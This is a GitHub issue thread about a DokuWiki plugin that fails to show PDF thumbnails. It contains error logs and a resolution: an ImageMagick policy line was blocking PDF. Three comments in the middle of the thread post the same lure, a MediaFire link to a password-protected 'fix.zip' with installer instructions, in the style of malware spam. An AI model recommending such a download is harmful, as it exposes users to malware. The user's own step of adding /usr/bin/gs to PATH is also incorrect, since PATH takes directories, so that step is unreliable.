### ISSUE TITLE
I get the message "No thumbnail in (...filename)"

### ISSUE THREAD

**Issue by Ragos81** [ternite/dokuwiki-plugin-mediathumbnails#4]
Originally from the [dokuwiki](https://forum.dokuwiki.org/d/22489-mediathumbnails-plugin-i-get-the-message-no-thumbnail-in-filename) forum, but posted here to better follow up.

Original post:

> Hi Thomas,
> 
> I have installed [mediathumbnails](https://www.dokuwiki.org/plugin:mediathumbnails) to show a preview of PDF's, but something is not working as I get the message
> `"No thumbnail in (...filename)"`
> at the location where the thumbnail should be.
> 
> The tested PDF should contain a thumbnail, as I can see it in the Windows Explorer (while other PDF's don't show a thumbnail) when the view is set to show icons.
> 
> I'm running the DokuWiki release **2024-02-06a "Kaos"** on **Debian12** and all the dependencies are installed and configured:
> 
> - The packages `php-imagick php8.2-imagick imagemagick imagemagick-6-common imagemagick-6.q16 ghostscript` are installed
> - In `/etc/php/8.2/apache2/php.ini` the line `extension=imagick` has been added
> - In `/etc/ImageMagick-7/policy.xml` the line `<policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}" />` has been added between the `<policymap> </policymap>` tags
> 
> Did I miss anything? Do I need to do anything else with ghostscript, except installing it?

I did miss to add ghostscript to the system PATH, for the once with the same issue, here my procedure:

1. Check if ghostscript is in $PATH
    - Input: `echo $PATH`
    - Output: `/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin`
2. Check ghostscript location
    - Input: `which gs`
    - Output: `/usr/bin/gs`
3. Add ghostscript to $PATH
    - Input: `nano /etc/profile`
    - Add `export PATH=$PATH:/usr/bin/gs` to the end of the file
4. Close ssh connection (or terminal) and open again
5. Confirm that ghostscript was added to $PATH
    - Input: `echo $PATH`
    - Output: `/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/bin/gs`

I also restarted apache, as I was not sure if it would be necessary or not:
`systemctl restart apache2`

As stated by Michael and Thomas, I also activated the `allowdebug` option in the DokuWiki base configuration.

Unfortunately all that didn't solve my problem.
The only debug output which seems somehow related to mediathumbnails was:
```
            [title] => Thumbnail test
            [internal] => Array
                (
                    [cache] => 1
                    [toc] => 1
                )

            [description] => Array
                (
                    [abstract] => Thumbnail test

Test if mediathumbnails plugin works for PDFs
                )

            [relation] => Array
                (
                    [firstimage] => 
                )
```

The error log shows:
```
2024-08-26 06:42:23
E_WARNING: Undefined array key 1
/var/www/html/lib/plugins/mediathumbnails/syntax.php(86)
#0 /var/www/html/lib/plugins/mediathumbnails/syntax.php(86): dokuwiki\ErrorHandler::errorHandler()
#1 /var/www/html/inc/parser/renderer.php(126): syntax_plugin_mediathumbnails->render()
#2 /var/www/html/inc/parserutils.php(535): Doku_Renderer->plugin()
#3 /var/www/html/inc/parserutils.php(299): p_render_metadata()
#4 /var/www/html/inc/common.php(262): p_get_metadata()
#5 /var/www/html/doku.php(101): pageinfo()
#6 {main}
2024-08-26 06:42:23
E_WARNING: Undefined array key 1
/var/www/html/lib/plugins/mediathumbnails/syntax.php(86)
#0 /var/www/html/lib/plugins/mediathumbnails/syntax.php(86): dokuwiki\ErrorHandler::errorHandler()
#1 /var/www/html/inc/parser/renderer.php(126): syntax_plugin_mediathumbnails->render()
#2 /var/www/html/inc/parserutils.php(691): Doku_Renderer->plugin()
#3 /var/www/html/inc/parserutils.php(158): p_render()
#4 /var/www/html/inc/parserutils.php(97): p_cached_output()
#5 /var/www/html/inc/Ui/PageView.php(67): p_wiki_xhtml()
#6 /var/www/html/inc/Action/Show.php(40): dokuwiki\Ui\PageView->show()
#7 /var/www/html/inc/template.php(120): dokuwiki\Action\Show->tplContent()
#8 [internal function]: tpl_content_core()
#9 /var/www/html/inc/Extension/Event.php(134): call_user_func_array()
#10 /var/www/html/inc/Extension/Event.php(200): dokuwiki\Extension\Event->trigger()
#11 /var/www/html/inc/template.php(102): dokuwiki\Extension\Event::createAndTrigger()
#12 /var/www/html/lib/tpl/dokuwiki/main.php(60): tpl_content()
#13 /var/www/html/inc/actions.php(30): include('...')
#14 /var/www/html/doku.php(131): act_dispatch()
#15 {main}
2024-08-26 06:42:23
E_WARNING: Undefined array key 1
/var/www/html/lib/plugins/mediathumbnails/syntax.php(86)
#0 /var/www/html/lib/plugins/mediathumbnails/syntax.php(86): dokuwiki\ErrorHandler::errorHandler()
#1 /var/www/html/inc/parser/renderer.php(126): syntax_plugin_mediathumbnails->render()
#2 /var/www/html/inc/parserutils.php(691): Doku_Renderer->plugin()
#3 /var/www/html/inc/parserutils.php(158): p_render()
#4 /var/www/html/lib/plugins/qc/helper.php(74): p_cached_output()
#5 /var/www/html/lib/plugins/qc/action/cron.php(69): helper_plugin_qc->getQCData()
#6 /var/www/html/inc/Extension/EventHandler.php(80): action_plugin_qc_cron->qccron()
#7 /var/www/html/inc/Extension/Event.php(75): dokuwiki\Extension\EventHandler->process_event()
#8 /var/www/html/inc/TaskRunner.php(49): dokuwiki\Extension\Event->advise_before()
#9 /var/www/html/lib/exe/taskrunner.php(20): dokuwiki\TaskRunner->run()
#10 {main}
```

Any ideas where the problem could be?

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ragos81** [comment]
I found the issue (which -unfortunately- I even mentioned in my first post here):

I wrote:

> In `/etc/ImageMagick-7/policy.xml` the line `<policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}" />` has been added between the `<policymap> </policymap>` tags

Correct would be `<policy domain=“coder” rights=“read|write” pattern=“PDF” />` or even simper:
Just delete the line `<policy domain="coder" rights="none" pattern="PDF" />` as mentioned in this [stackoverflow](https://stackoverflow.com/questions/52998331/imagemagick-security-policy-pdf-blocking-conversion) thread.

**Comment by ternite** [comment]
Hi @Ragos81 , thanks for your little nudge. I'm sorry I wasn't able to take a look at your issue in time. There's a tiny issue that's nagging me for years by now in one of the plugins I'm using and maintaining (well, sort of). It's a password dialog that doesn't answer to ENTER so I have to resort to using the mouse and press the according button. I couldn't get myself into fixing it despite constant reminders.

So I understand that your problem is solved, by now? The correct policy syntax is documented in the [mediathumbnail](https://www.dokuwiki.org/plugin:mediathumbnails) installation instructions. I'm glad you figured it out.

**Comment by Ragos81** [comment]
@ternite 
That is correct, mediathumbnails is now working as expected and I don't know how I even messed it up in the first place. Anyways I just kept going to use the filelisting app to show issues of some magazines. It worked, but didn't look good, no one would notice when a new issue was uploaded and searching for an issue would give no result.

<img width="340" height="299" alt="Image" src="https://github.com/user-attachments/assets/0087124f-1aaf-432d-b5a2-9723f58da5d8" />

Now since mediathumbnails is working, I can combine it with [latexcaption](https://www.dokuwiki.org/plugin:latexcaption) to have a much nicer look and feel of the page.

<img width="791" height="238" alt="Image" src="https://github.com/user-attachments/assets/cbf8c0e6-e226-4210-bcd9-50f1d92436e8" />

**Comment by ternite** [comment]
Thank you for this insight into one use case of the mediathumbnails plugin. For our own (corporate) intranet, there are not many pages profiting from using it. In your case, it looks like a neat feature!
